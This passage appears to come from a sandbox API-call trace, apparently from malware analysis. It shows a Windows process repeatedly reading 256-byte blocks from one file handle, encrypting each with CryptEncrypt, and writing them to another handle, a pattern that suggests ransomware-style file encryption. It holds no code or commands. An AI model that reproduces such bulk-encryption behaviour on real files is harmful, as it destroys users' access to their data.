lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.240] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.240] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.240] GetLastError () returned 0x0 [0162.240] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.240] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.241] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.241] GetLastError () returned 0x0 [0162.241] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.241] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.241] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.241] GetLastError () returned 0x0 [0162.241] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.241] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.241] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.241] GetLastError () returned 0x0 [0162.241] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.241] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.241] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.241] GetLastError () returned 0x0 [0162.241] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.241] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.241] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.241] GetLastError () returned 0x0 [0162.241] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.241] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.241] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.241] GetLastError () returned 0x0 [0162.241] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.241] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.241] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.241] GetLastError () returned 0x0 [0162.241] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.242] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.242] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.242] GetLastError () returned 0x0 [0162.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.242] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.242] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.242] GetLastError () returned 0x0 [0162.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.242] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.242] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.242] GetLastError () returned 0x0 [0162.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.242] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.242] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.242] GetLastError () returned 0x0 [0162.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.242] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.242] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.242] GetLastError () returned 0x0 [0162.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.242] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.242] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.242] GetLastError () returned 0x0 [0162.242] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.243] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.243] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.243] GetLastError () returned 0x0 [0162.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.243] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.243] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.243] GetLastError () returned 0x0 [0162.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.243] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.243] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.243] GetLastError () returned 0x0 [0162.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.243] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.243] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.243] GetLastError () returned 0x0 [0162.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.243] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.243] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.243] GetLastError () returned 0x0 [0162.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.243] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.243] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.243] GetLastError () returned 0x0 [0162.243] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.243] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.244] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.244] GetLastError () returned 0x0 [0162.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.244] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.244] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.244] GetLastError () returned 0x0 [0162.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.244] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.244] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.244] GetLastError () returned 0x0 [0162.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.244] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.244] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.244] GetLastError () returned 0x0 [0162.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.244] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.244] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.244] GetLastError () returned 0x0 [0162.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.244] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.244] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.244] GetLastError () returned 0x0 [0162.244] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.244] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.245] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.245] GetLastError () returned 0x0 [0162.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.245] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.245] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.245] GetLastError () returned 0x0 [0162.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.245] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.245] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.245] GetLastError () returned 0x0 [0162.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.245] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.245] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.245] GetLastError () returned 0x0 [0162.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.245] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.245] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.245] GetLastError () returned 0x0 [0162.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0162.245] ReadFile (in: hFile=0x1624, lpBuffer=0x28fb710, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28fb710*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0162.245] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0162.245] GetLastError () returned 0x0 [0162.245] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, 